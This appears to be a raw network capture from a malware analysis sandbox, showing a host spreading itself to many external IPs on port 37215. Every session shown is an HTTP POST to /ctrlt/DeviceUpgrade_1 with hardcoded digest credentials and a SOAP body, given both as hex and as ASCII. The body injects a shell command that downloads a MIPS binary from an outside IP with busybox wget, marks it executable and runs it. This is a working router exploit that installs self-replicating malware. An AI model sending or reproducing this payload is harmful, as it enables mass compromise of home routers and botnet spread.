                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          751192.168.2.2360856102.173.52.15937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.229557037 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          752192.168.2.2344688173.248.138.14637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.229736090 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          753192.168.2.2352348197.72.87.19537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.229773998 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          754192.168.2.2340306197.121.171.17937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.229796886 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          755192.168.2.2350732157.46.136.23537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.229840994 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          756192.168.2.2358752197.24.195.16037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.229880095 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          757192.168.2.2338780157.88.36.12937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.229904890 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          758192.168.2.234895844.28.118.14637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.229923964 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          759192.168.2.235646441.80.85.17237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.230226994 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          760192.168.2.2360140157.166.112.10637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.230268002 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          761192.168.2.2360732170.238.168.7437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.230314970 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
